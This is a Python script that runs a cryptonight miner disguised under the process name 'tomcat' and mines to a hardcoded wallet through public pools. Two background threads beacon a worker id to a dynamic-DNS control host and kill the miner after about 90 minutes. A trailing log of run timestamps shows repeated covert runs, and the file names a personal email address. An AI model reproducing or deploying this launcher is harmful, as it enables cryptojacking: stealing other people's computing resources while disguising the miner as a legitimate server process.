import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:19:07.343949
#2018-02-17 17:07:02.063225
#2018-02-17 18:55:04.179641
#2018-02-17 20:43:06.659467
#2018-02-17 22:30:08.589175
#2018-02-18 00:13:04.662828
#2018-02-18 02:05:07.335634
#2018-02-18 03:52:07.018343
#2018-02-18 05:41:05.561919
#2018-02-18 07:33:05.335045
#2018-02-18 09:21:07.546638
#2018-02-18 11:07:05.590016
#2018-02-18 12:54:05.845183
#2018-02-18 14:40:04.318041
#2018-02-18 16:29:03.429877
#2018-02-18 18:18:06.495520
#2018-02-18 20:04:04.242176
#2018-02-18 21:51:07.366034
#2018-02-18 23:40:07.591122
#2018-02-19 01:26:05.000708
#2018-02-19 03:15:01.528525
#2018-02-19 05:00:01.553112
#2018-02-19 06:46:04.923311
#2018-02-19 08:35:04.330945
#2018-02-19 10:24:05.510221
#2018-02-19 12:12:01.388155
#2018-02-19 14:00:13.234176
#2018-02-19 15:49:07.559080
#2018-02-19 17:37:07.085699
#2018-02-19 19:26:04.357432
#2018-02-19 21:14:06.386947
#2018-02-19 23:01:01.994580
#2018-02-20 00:44:03.811628
#2018-02-20 02:35:03.790105
#2018-02-20 04:24:02.062509
#2018-02-20 06:08:05.231269
#2018-02-20 07:53:05.046030
#2018-02-20 09:39:05.663790
#2018-02-20 11:23:08.792899
#2018-02-20 13:08:07.341471
#2018-02-20 14:53:05.744856
#2018-02-20 16:40:01.360445
#2018-02-20 18:27:08.950511
#2018-02-20 20:20:04.462132
#2018-02-20 22:07:04.958025
#2018-02-20 23:47:06.721407
#2018-02-21 01:31:05.706711
#2018-02-21 03:18:06.570963
#2018-02-21 05:07:07.168090
#2018-02-21 06:54:08.100877
#2018-02-21 08:42:07.402551
#2018-02-21 10:29:07.231396
#2018-02-21 12:17:06.004649
#2018-02-21 14:05:06.943717
#2018-02-21 15:51:01.676206
#2018-02-21 17:44:06.004815
#2018-02-21 19:31:02.061952
#2018-02-21 21:18:06.475099
#2018-02-21 23:04:07.499709
#2018-02-22 00:53:04.189126
#2018-02-22 02:41:02.110940
#2018-02-22 04:27:05.097600
#2018-02-22 06:13:06.646169
#2018-02-22 07:57:05.863105
#2018-02-22 09:47:01.370024
#2018-02-22 11:32:06.327560
#2018-02-22 13:20:07.705584
#2018-02-22 15:09:01.911180
#2018-02-22 16:54:04.737453
#2018-02-22 18:43:09.295058
#2018-02-22 20:36:09.063703
#2018-02-22 22:22:01.782053
#2018-02-23 00:08:04.503177
#2018-02-23 01:56:05.871954
#2018-02-23 03:43:08.210410
#2018-02-23 05:27:06.958963
#2018-02-23 07:14:07.119909
#2018-02-23 09:20:06.785346
#2018-02-23 11:26:04.066338
#2018-02-23 13:15:11.206299
#2018-02-23 15:02:05.984409
#2018-02-23 16:51:09.734728
#2018-02-23 18:42:07.367715
#2018-02-23 20:28:05.972060
#2018-02-23 22:17:06.351323
#2018-02-24 00:03:03.939825
#2018-02-24 01:52:06.853401
#2018-02-24 03:46:01.887969
#2018-02-24 05:35:02.711653
#2018-02-24 07:21:04.169870
#2018-02-24 09:11:01.664285
#2018-02-24 11:06:05.951898
#2018-02-24 12:55:03.001880
#2018-02-24 14:43:02.213369
#2018-02-24 16:34:05.558691
#2018-02-24 18:23:07.589960
#2018-02-24 20:10:07.338703
#2018-02-24 21:54:07.553595
#2018-02-25 00:56:06.357561
#2018-02-25 03:54:04.978999
#2018-02-25 06:38:07.260116
#2018-02-25 11:36:07.375818
#2018-02-25 13:42:01.576498
#2018-02-25 15:16:01.158988